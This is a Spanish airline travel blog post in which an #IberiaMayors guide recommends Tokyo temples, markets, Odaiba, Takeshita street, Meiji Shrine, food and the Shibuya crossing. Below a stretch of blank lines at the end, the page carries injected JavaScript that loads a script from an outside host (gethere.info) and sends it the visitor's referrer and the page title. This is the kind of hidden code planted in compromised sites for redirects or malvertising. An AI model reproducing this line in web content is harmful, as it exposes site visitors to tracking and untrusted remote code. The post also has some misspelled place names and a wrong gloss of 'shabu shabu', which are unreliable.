Pasado y futuro coexisten en Tokio #IberiaMayors

23/01/2017

Iberia_Mayors_mayors_ficha_Tokio

Esta vez nos vamos hasta Tokio con nuestro #IberiaMayors, David Esteban, quien nos enseña los rincones más interesantes de esta ciudad, la cual describe como  «grande y agitada, pero llena de rincones que te trasladan a otras épocas «.

Empezamos el recorrido en el Templo Zojoji, un lugar que refleja claramente el contraste que existe entre tradición y modernidad, ya que detrás de este lugar sagrado podemos encontrar la famosa Tokio Tower.

Japón es famoso por su exclusiva y diferenciada gastronomía. Si quieres deleitarte con la mejor comida de Tokio, no te puedes perder el Mercado de Tsukiji, el cual es el más grande del mundo. Además, en sus aledaños podrás encontrar multitud de restaurantes con comida tradicional, en caso de que se te abra el apetito.

Es hora de disfrutar de algunas de las vistas más emblemáticas de la ciudad,  y para ello , nada mejor que hacerlo desde la Isla Odaiba. En esta zona, también encontraréis una réplica de la Estatua de la Libertad y la «playa» de Tokio, que aunque sea artificial, es el lugar preferido de los románticos para disfrutar de la puesta de sol.

Uno de los planes imprescindibles de la capital japonesa es pasear por la Calle Thakesita, repleta de tiendas y de jóvenes japoneses buscando comprar las últimas tendencias. Lo más destacado son sus coloridos escaparates y la extravagante multitud que recorre esta pequeña vía.

Iberia_Mayors_mayors_bannerblog_Tokio

Un lugar emblemático de Tokio  es el Santuario Meiji, dedicado a los espíritus del Emperador Meiji y su mujer, la Emperatriz Shōken. Desde aquí, nuestro #IberiaMayors recomienda hacer una parada en cualquiera de los cientos de restaurantes que forman el Muelle de Yokocho. Algunos son tan pequeños que casi no hay distancia entre la barra de la taberna y la pared.

Como comida tradicional, te recomendamos que pruebes el «Shabu Shabu». Plato que recibe ese nombre debido a que el significado de su onomatopeya es «caliente caliente». ¡Los japoneses tienen onomatopeyas para todo!

Por último, tienes que visitar probablemente el lugar más famoso de Tokio, el Cruce de Shibuya, cuyo paso de peatones es el más transitados del mundo.  Además, David nos recuerda que «en Tokio hay que pensar en vertical», ya que siempre puedes hacer cualquier plan en el bar o en la discoteca de la séptima planta de cualquier edificio.

Nuestro #IberiaMayors se despide con un Sayonara, pero no sin antes confesarnos que lo que más le gusta a los turistas de la ciudad es «el gran contraste entre tradición y modernidad, y la armonía de los japoneses»

Encuentra la puerta a Tokio en este link, y descubre una increíble ciudad.

¡Te esperamos!

 

 

 

 

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;